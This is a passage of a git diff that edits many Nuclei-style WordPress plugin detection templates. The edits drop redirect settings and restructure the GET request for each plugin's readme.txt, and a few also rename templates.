+13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" diff --git a/technologies/wordpress/plugins/disable-comments.yaml b/technologies/wordpress/plugins/disable-comments.yaml index 451dc11e9d..b8f5b6bc14 100644 --- a/technologies/wordpress/plugins/disable-comments.yaml +++ b/technologies/wordpress/plugins/disable-comments.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" diff --git a/technologies/wordpress/plugins/disable-gutenberg.yaml b/technologies/wordpress/plugins/disable-gutenberg.yaml index 21c86999e1..90527f8582 100644 --- a/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" diff --git a/technologies/wordpress/plugins/duplicate-page.yaml b/technologies/wordpress/plugins/duplicate-page.yaml index 1fea390771..443affefe2 100644 --- a/technologies/wordpress/plugins/duplicate-page.yaml +++ b/technologies/wordpress/plugins/duplicate-page.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" diff --git a/technologies/wordpress/plugins/duplicate-post.yaml b/technologies/wordpress/plugins/duplicate-post.yaml index 9a8eab7540..9cfa3c43ba 100644 --- a/technologies/wordpress/plugins/duplicate-post.yaml +++ b/technologies/wordpress/plugins/duplicate-post.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" diff --git a/technologies/wordpress/plugins/duplicator.yaml b/technologies/wordpress/plugins/duplicator.yaml index cf6463e43b..3ab9102e70 100644 --- a/technologies/wordpress/plugins/duplicator.yaml +++ b/technologies/wordpress/plugins/duplicator.yaml @@ -1,7 +1,7 @@ id: wordpress-duplicator info: - name: Duplicator – WordPress Migration Plugin Detection + name: Duplicator – WordPress Migration & Backup Plugin Detection author: ricardomaia severity: info reference: @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" diff --git a/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 7fd496897a..c87ec8701b 100644 --- a/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" diff --git a/technologies/wordpress/plugins/easy-fancybox.yaml b/technologies/wordpress/plugins/easy-fancybox.yaml index 1ed5d4f5c5..a4d51b7191 100644 --- a/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/technologies/wordpress/plugins/easy-fancybox.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/easy-fancybox/readme.txt" diff --git a/technologies/wordpress/plugins/easy-google-fonts.yaml b/technologies/wordpress/plugins/easy-google-fonts.yaml index 5203010007..d1904eb5fb 100644 --- a/technologies/wordpress/plugins/easy-google-fonts.yaml +++ b/technologies/wordpress/plugins/easy-google-fonts.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/easy-google-fonts/readme.txt" diff --git a/technologies/wordpress/plugins/easy-table-of-contents.yaml b/technologies/wordpress/plugins/easy-table-of-contents.yaml index 9dc93c7dd0..85b9d567e5 100644 --- a/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" diff --git a/technologies/wordpress/plugins/easy-wp-smtp.yaml b/technologies/wordpress/plugins/easy-wp-smtp.yaml index 490b686c5c..1b644af3b4 100644 --- a/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-wp-smtp info: - name: Easy WP SMTP Detection + name: Easy WP SMTP – WordPress Email SMTP Plugin Detection author: ricardomaia severity: info reference: @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" diff --git a/technologies/wordpress/plugins/elementor.yaml b/technologies/wordpress/plugins/elementor.yaml index 86162e919f..853385d9fb 100644 --- a/technologies/wordpress/plugins/elementor.yaml +++ b/technologies/wordpress/plugins/elementor.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" diff --git a/technologies/wordpress/plugins/elementskit-lite.yaml b/technologies/wordpress/plugins/elementskit-lite.yaml index e7afec416c..aa6a26bbb9 100644 --- a/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/technologies/wordpress/plugins/elementskit-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-elementskit-lite info: - name: ElementsKit Elementor addons (Header Footer Builder, Mega Menu Builder, Free Widgets & Templates Library) Detection + name: ElementsKit Elementor addons (Header Footer Builder, Mega Menu Builder, Free Elementor Widgets & Templates Library) Detection author: ricardomaia severity: info reference: @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" diff --git a/technologies/wordpress/plugins/enable-media-replace.yaml b/technologies/wordpress/plugins/enable-media-replace.yaml index 2b740a3bc5..6e1c3462d2 100644 --- a/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/technologies/wordpress/plugins/enable-media-replace.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" diff --git a/technologies/wordpress/plugins/envato-elements.yaml b/technologies/wordpress/plugins/envato-elements.yaml index de910dccc9..a11b561674 100644 --- a/technologies/wordpress/plugins/envato-elements.yaml +++ b/technologies/wordpress/plugins/envato-elements.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" diff --git a/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 2d278cd69f..d971020da1 100644 --- a/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" diff --git a/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/technologies/wordpress/plugins/ewww-image-optimizer.yaml index e80b2fcda2..11e864ce0e 100644 --- a/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" diff --git a/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index e5c10a19e8..725109a6cb 100644 --- a/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" diff --git a/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 51fb053663..cce678dcea 100644 --- a/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" diff --git a/technologies/wordpress/plugins/flamingo.yaml b/technologies/wordpress/plugins/flamingo.yaml index 569f038915..1f6d47188d 100644 --- a/technologies/wordpress/plugins/flamingo.yaml +++ b/technologies/wordpress/plugins/flamingo.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" diff --git a/technologies/wordpress/plugins/fluentform.yaml b/technologies/wordpress/plugins/fluentform.yaml index 41a657d4db..402e4bbf96 100644 --- a/technologies/wordpress/plugins/fluentform.yaml +++ b/technologies/wordpress/plugins/fluentform.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" diff --git a/technologies/wordpress/plugins/font-awesome.yaml b/technologies/wordpress/plugins/font-awesome.yaml index 751846c1ec..de141affdd 100644 --- a/technologies/wordpress/plugins/font-awesome.yaml +++ b/technologies/wordpress/plugins/font-awesome.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" diff --git a/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 769ce26fe6..3158521b37 100644 --- a/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" diff --git a/technologies/wordpress/plugins/formidable.yaml b/technologies/wordpress/plugins/formidable.yaml index e3660caae4..f7b92c8738 100644 --- a/technologies/wordpress/plugins/formidable.yaml +++ b/technologies/wordpress/plugins/formidable.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" diff --git a/technologies/wordpress/plugins/forminator.yaml b/technologies/wordpress/plugins/forminator.yaml index 5c511e7f44..65cc00cc24 100644 --- a/technologies/wordpress/plugins/forminator.yaml +++ b/technologies/wordpress/plugins/forminator.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" diff --git a/technologies/wordpress/plugins/ga-google-analytics.yaml b/technologies/wordpress/plugins/ga-google-analytics.yaml index 21dfc65c47..d811f1b89d 100644 --- a/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" diff --git a/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 6388a0ea1f..fb6bd7b9f7 100644 --- a/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" diff --git a/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 692a3c20dd..8df1c01aef 100644 --- a/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" diff --git a/technologies/wordpress/plugins/google-listings-and-ads.yaml b/technologies/wordpress/plugins/google-listings-and-ads.yaml index 00b3a426f9..26397f93ca 100644 --- a/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" diff --git a/technologies/wordpress/plugins/google-site-kit.yaml b/technologies/wordpress/plugins/google-site-kit.yaml index 99473eae02..eea200259d 100644 --- a/technologies/wordpress/plugins/google-site-kit.yaml +++ b/technologies/wordpress/plugins/google-site-kit.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" diff --git a/technologies/wordpress/plugins/google-sitemap-generator.yaml b/technologies/wordpress/plugins/google-sitemap-generator.yaml index 10b3719178..0fac736546 100644 --- a/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" diff --git a/technologies/wordpress/plugins/gtranslate.yaml b/technologies/wordpress/plugins/gtranslate.yaml index 00ab15d4ed..4e26788595 100644 --- a/technologies/wordpress/plugins/gtranslate.yaml +++ b/technologies/wordpress/plugins/gtranslate.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" diff --git a/technologies/wordpress/plugins/gutenberg.yaml b/technologies/wordpress/plugins/gutenberg.yaml index 7d4c2bc22d..0cd049e684 100644 --- a/technologies/wordpress/plugins/gutenberg.yaml +++ b/technologies/wordpress/plugins/gutenberg.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" diff --git a/technologies/wordpress/plugins/happy-elementor-addons.yaml b/technologies/wordpress/plugins/happy-elementor-addons.yaml index 92de456c5d..c541ac1c23 100644 --- a/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" diff --git a/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/technologies/wordpress/plugins/header-and-footer-scripts.yaml index b66950eeb6..dce6d5559e 100644 --- a/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/header-and-footer-scripts/readme.txt" diff --git a/technologies/wordpress/plugins/header-footer-code-manager.yaml b/technologies/wordpress/plugins/header-footer-code-manager.yaml index 1c1e4ffc9d..43cce1df17 100644 --- a/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" diff --git a/technologies/wordpress/plugins/header-footer-elementor.yaml b/technologies/wordpress/plugins/header-footer-elementor.yaml index 6c2a825366..179cd8238f 100644 --- a/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" diff --git a/technologies/wordpress/plugins/header-footer.yaml b/technologies/wordpress/plugins/header-footer.yaml index ee12dea339..b747894088 100644 --- a/technologies/wordpress/plugins/header-footer.yaml +++ b/technologies/wordpress/plugins/header-footer.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" diff --git a/technologies/wordpress/plugins/health-check.yaml b/technologies/wordpress/plugins/health-check.yaml index f5e33024d1..6c0a3284b7 100644 --- a/technologies/wordpress/plugins/health-check.yaml +++ b/technologies/wordpress/plugins/health-check.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" diff --git a/technologies/wordpress/plugins/hello-dolly.yaml b/technologies/wordpress/plugins/hello-dolly.yaml index fd5f115e99..4972bc3834 100644 --- a/technologies/wordpress/plugins/hello-dolly.yaml +++ b/technologies/wordpress/plugins/hello-dolly.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" diff --git a/technologies/wordpress/plugins/imagify.yaml b/technologies/wordpress/plugins/imagify.yaml index b782ca21d3..b3b8f3494b 100644 --- a/technologies/wordpress/plugins/imagify.yaml +++ b/technologies/wordpress/plugins/imagify.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" diff --git a/technologies/wordpress/plugins/imsanity.yaml b/technologies/wordpress/plugins/imsanity.yaml index 1c0370f2a0..5f70265d00 100644 --- a/technologies/wordpress/plugins/imsanity.yaml +++ b/technologies/wordpress/plugins/imsanity.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" diff --git a/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/technologies/wordpress/plugins/insert-headers-and-footers.yaml index cb4e854f2e..c5bb221a2b 100644 --- a/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" diff --git a/technologies/wordpress/plugins/instagram-feed.yaml b/technologies/wordpress/plugins/instagram-feed.yaml index 920aa9e46a..e7f47716b4 100644 --- a/technologies/wordpress/plugins/instagram-feed.yaml +++ b/technologies/wordpress/plugins/instagram-feed.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" diff --git a/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 30177dd952..86686d0674 100644 --- a/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" diff --git a/technologies/wordpress/plugins/iwp-client.yaml b/technologies/wordpress/plugins/iwp-client.yaml index f632f9cadb..bffa2650d2 100644 --- a/technologies/wordpress/plugins/iwp-client.yaml +++ b/technologies/wordpress/plugins/iwp-client.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" diff --git a/technologies/wordpress/plugins/jetpack.yaml b/technologies/wordpress/plugins/jetpack.yaml index d1e8fc83d0..5e72bf3d81 100644 --- a/technologies/wordpress/plugins/jetpack.yaml +++ b/technologies/wordpress/plugins/jetpack.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" diff --git a/technologies/wordpress/plugins/kadence-blocks.yaml b/technologies/wordpress/plugins/kadence-blocks.yaml index 98a944477e..251eb3cf97 100644 --- a/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/technologies/wordpress/plugins/kadence-blocks.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" diff --git a/technologies/wordpress/plugins/kirki.yaml b/technologies/wordpress/plugins/kirki.yaml index 6657dbe169..ee5cea307e 100644 --- a/technologies/wordpress/plugins/kirki.yaml +++ b/technologies/wordpress/plugins/kirki.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" diff --git a/technologies/wordpress/plugins/leadin.yaml b/technologies/wordpress/plugins/leadin.yaml index 077e40d35c..32ea2cd15c 100644 --- a/technologies/wordpress/plugins/leadin.yaml +++ b/technologies/wordpress/plugins/leadin.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" diff --git a/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 8c0103e397..d7adfda251 100644 --- a/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" diff --git a/technologies/wordpress/plugins/limit-login-attempts.yaml b/technologies/wordpress/plugins/limit-login-attempts.yaml index fb7ed2b866..ec7a6065f8 100644 --- a/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" diff --git a/technologies/wordpress/plugins/litespeed-cache.yaml b/technologies/wordpress/plugins/litespeed-cache.yaml index 72fa8d3734..536e08ce96 100644 --- a/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/technologies/wordpress/plugins/litespeed-cache.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" diff --git a/technologies/wordpress/plugins/loco-translate.yaml b/technologies/wordpress/plugins/loco-translate.yaml index 37b638b1d4..c2fc972514 100644 --- a/technologies/wordpress/plugins/loco-translate.yaml +++ b/technologies/wordpress/plugins/loco-translate.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" diff --git a/technologies/wordpress/plugins/loginizer.yaml b/technologies/wordpress/plugins/loginizer.yaml index 1d7a9e15a6..4da5787da4 100644 --- a/technologies/wordpress/plugins/loginizer.yaml +++ b/technologies/wordpress/plugins/loginizer.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" diff --git a/technologies/wordpress/plugins/loginpress.yaml b/technologies/wordpress/plugins/loginpress.yaml index 1cc04d84c4..4f83cda703 100644 --- a/technologies/wordpress/plugins/loginpress.yaml +++ b/technologies/wordpress/plugins/loginpress.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/loginpress/readme.txt" diff --git a/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 2fd48d4e67..6f2812f656 100644 --- a/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" diff --git a/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 45f5ee4ddf..b9dfe4969b 100644 --- a/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-wp/readme.txt" diff --git a/technologies/wordpress/plugins/mailpoet.yaml b/technologies/wordpress/plugins/mailpoet.yaml index cec7c07865..0f2d815e16 100644 --- a/technologies/wordpress/plugins/mailpoet.yaml +++ b/technologies/wordpress/plugins/mailpoet.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" diff --git a/technologies/wordpress/plugins/maintenance.yaml b/technologies/wordpress/plugins/maintenance.yaml index 00293c8abe..8bb30fe57b 100644 --- a/technologies/wordpress/plugins/maintenance.yaml +++ b/technologies/wordpress/plugins/maintenance.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" diff --git a/technologies/wordpress/plugins/mainwp-child.yaml b/technologies/wordpress/plugins/mainwp-child.yaml index db0812bdc1..1cb378d033 100644 --- a/technologies/wordpress/plugins/mainwp-child.yaml +++ b/technologies/wordpress/plugins/mainwp-child.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" diff --git a/technologies/wordpress/plugins/malcare-security.yaml b/technologies/wordpress/plugins/malcare-security.yaml index fa291f6d88..39f59a9f13 100644 --- a/technologies/wordpress/plugins/malcare-security.yaml +++ b/technologies/wordpress/plugins/malcare-security.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" diff --git a/technologies/wordpress/plugins/megamenu.yaml b/technologies/wordpress/plugins/megamenu.yaml index 77031d6138..b19350ff4c 100644 --- a/technologies/wordpress/plugins/megamenu.yaml +++ b/technologies/wordpress/plugins/megamenu.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" diff --git a/technologies/wordpress/plugins/members.yaml b/technologies/wordpress/plugins/members.yaml index 06dd39dc7d..e59cbed524 100644 --- a/technologies/wordpress/plugins/members.yaml +++ b/technologies/wordpress/plugins/members.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/members/readme.txt" diff --git a/technologies/wordpress/plugins/meta-box.yaml b/technologies/wordpress/plugins/meta-box.yaml index 8c96f3c9eb..b016dc961f 100644 --- a/technologies/wordpress/plugins/meta-box.yaml +++ b/technologies/wordpress/plugins/meta-box.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" diff --git a/technologies/wordpress/plugins/ml-slider.yaml b/technologies/wordpress/plugins/ml-slider.yaml index b077126af2..bee3c6c4a8 100644 --- a/technologies/wordpress/plugins/ml-slider.yaml +++ b/technologies/wordpress/plugins/ml-slider.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" diff --git a/technologies/wordpress/plugins/newsletter.yaml b/technologies/wordpress/plugins/newsletter.yaml index ec2dd64e53..2c257573a7 100644 --- a/technologies/wordpress/plugins/newsletter.yaml +++ b/technologies/wordpress/plugins/newsletter.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" diff --git a/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ef17fe5662..ba53e68e57 100644 --- a/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" diff --git a/technologies/wordpress/plugins/nextgen-gallery.yaml b/technologies/wordpress/plugins/nextgen-gallery.yaml index 695b181704..a36855e4ed 100644 --- a/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" diff --git a/technologies/wordpress/plugins/ninja-forms.yaml b/technologies/wordpress/plugins/ninja-forms.yaml index 27a2ddad7c..f6303421d5 100644 --- a/technologies/wordpress/plugins/ninja-forms.yaml +++ 